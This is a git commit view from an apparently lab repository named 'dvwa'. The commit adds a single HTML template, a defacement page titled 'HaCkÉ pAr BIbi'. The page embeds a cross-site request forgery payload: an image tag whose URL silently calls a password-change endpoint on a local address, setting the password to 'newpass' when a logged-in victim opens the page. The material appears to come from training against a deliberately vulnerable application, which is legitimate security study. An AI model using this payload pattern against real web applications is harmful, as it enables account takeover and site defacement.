diff options
| author | jerome <jerome@xlinfo.fr> | 2023-09-19 17:02:40 +0200 |
|---|---|---|
| committer | jerome <jerome@xlinfo.fr> | 2023-09-19 17:02:40 +0200 |
| commit | 2585495cfab54366a668777216b88a4f4b686102 (patch) | |
| tree | 9487b4d11eba4f46566a4a99bcef512d79717e74 /index_tpl.html | |
| download | dvwa-2585495cfab54366a668777216b88a4f4b686102.tar.gz dvwa-2585495cfab54366a668777216b88a4f4b686102.zip | |
commit initial
Diffstat (limited to 'index_tpl.html')
| -rw-r--r-- | index_tpl.html | 13 |
1 files changed, 13 insertions, 0 deletions
diff --git a/index_tpl.html b/index_tpl.html new file mode 100644 index 0000000..e613012 --- /dev/null +++ b/index_tpl.html @@ -0,0 +1,13 @@ +<!DOCTYPE html> +<html> +<head> +<meta charset="UTF-8"> +<title>HaCkÉ pAr BIbi</title> +</head> +<body> +<h1>T'es HaCkÉ par bIbI! </h1> +<img src="http://172.17.0.1/hack.jpeg" alt="" /> +<img src="http://172.17.0.2/vulnerabilities/csrf/?password_new=newpass&password_conf=newpass&Change=Change" /> +</body> +</html> + |
